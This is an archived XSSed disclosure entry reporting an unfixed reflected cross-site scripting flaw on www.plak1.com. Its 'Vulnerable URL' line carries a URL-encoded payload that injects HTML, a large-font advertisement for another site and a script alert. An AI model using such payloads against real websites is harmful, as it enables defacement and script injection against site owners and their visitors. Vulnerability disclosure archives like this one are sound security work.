Unfixed XSS vulnerability at www.plak1.com

2009-06-26T00:00:00
ID XSSED:62045
Type xssed
Reporter CanDarK
Modified 2011-12-16T00:00:00

Description

Security researcher CanDarK, has submitted on 26/06/2009 a cross-site-scripting (XSS) vulnerability affecting www.plak1.com, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.plak1.com/Arkadas.php?sarkici=erman%20e%22%3E%3Ch1%3Cdsander&sarki=ajdar%20diss&id=54751%22%3E%3Cfont%20style=font-size:70pt%3%3EWWW.MP3SES.COM%3Cbr%3EOnline%20M%FCzik%20Dinleme%3Cscript%3Ealert(/ww.mp3ses.com/)%3C/script%3E